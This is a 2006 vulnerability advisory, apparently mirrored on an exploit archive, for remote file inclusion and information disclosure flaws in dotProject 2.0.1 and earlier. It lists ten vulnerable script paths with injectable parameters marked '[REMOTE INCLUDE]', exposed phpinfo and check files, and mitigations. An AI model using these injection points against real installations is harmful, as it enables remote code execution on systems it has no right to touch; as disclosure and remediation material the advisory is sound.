dotProject-2.0.1.txt

dotProject-2.0.1.txt: Posted Feb 14, 2006; Authored by Robin Verton; dotProject versions 2.0.1 and below are vulnerable to multiple arbitrary code execution and information disclosure problems.; tags | exploit, arbitrary, code execution, info disclosure; SHA-256 | 65d278cfd1e0fb5de0c01a4650d9eb60a82d1f8ca72d701d3d4d18e7db65063f; Download | Favorite | View

dotProject-2.0.1.txt

dotproject <= 2.0.1 remote code execution
======================================

  Software: dotProject <= 2.0.1
     Severity: Arbitrary code execution, Path/Information Disclosure
     Risk: High
     Author: Robin Verton <r.verton@gmail.com>
     Date: Feb. 14 2006
     Vendor: dotproject.net [contacted]

  Description:
   dotProject is a volunteer supported Project Management application.

  Details:
   The 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter.
   Some user-supplied input is not checked correctly so an attacker can include a remote php file and
   execute arbitrary phpcode or arbitrary system command via eval().

   Because there are over 10 Bugs I only post the vulnerable files + parameters which are not checked.
   To exploit these vulnerables register_globals have to be set ON (default).

   1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]
 
   2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]
 
   3) /includes/session.php?baseDir=[REMOTE INCLUDE]
   
   4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
 
   5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
 
   6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
 
   7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
 
   8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
 
   9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
 
   10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

   There are also some path discolsure bugs:

   Nearly ALL files in /db/ give out some nice php-errors by accessing them directly with the parameter
   baseDir=foobar.

   Then, if the /doc/ directory is not deleted (default) you can access to two varoius files which
   disclose you some system informations:

   1) /docs/phpinfo.php - A phpinfo() file.
 
   2) /docs/check.php - Some more informations about the installed dotProject.

  Solution:
   Turn register_globals OFF, delete the /docs/ dir and cover /db/ dir with an htaccess.

  Timeline:
   24.01.2006 - Bugs found
   26.01.2006 - Vendor Contacted
   14.02.2006 - Publishing

  Credits:
   Credits go to Robin Verton (r.verton [at] gmail [dot] com)

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

dotProject-2.0.1.txt

dotProject-2.0.1.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

dotProject-2.0.1.txt

Share This

dotProject-2.0.1.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems